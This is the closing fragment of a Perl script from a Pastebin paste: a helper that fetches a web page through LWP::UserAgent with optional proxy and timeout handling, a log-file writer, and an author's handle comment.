  596. }
  597.  
  598. sub get_content {
  599.     my $timeout = $_[0];
  600.     my $url = $_[1];
  601.     my $ua  = LWP::UserAgent->new(agent => "Mozilla/5.0");
  602.     if ($proxy) { $ua->proxy("http", "http://".$proxy."/"); }
  603.     if ($timeout == 1) { $ua->timeout(10); }
  604.     my $req = HTTP::Request->new(GET => 'http://'.$url);
  605.     my $response = $ua->request($req);
  606.     if ($timeout == 1) { if ($response->is_error) { print "\n [$logo] [timeout]\n"; }}
  607.     return $response->content;
  608. }
  609.  
  610. sub w_log {
  611.     my $data = $_[0];
  612.     open(LOG,">>$log") or die(" [!] Cannot create or open log file.\n\n");
  613.     print LOG "$data";
  614.     close(LOG);
  615. }
  616.  
  617. # c0li.m0de.0n
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top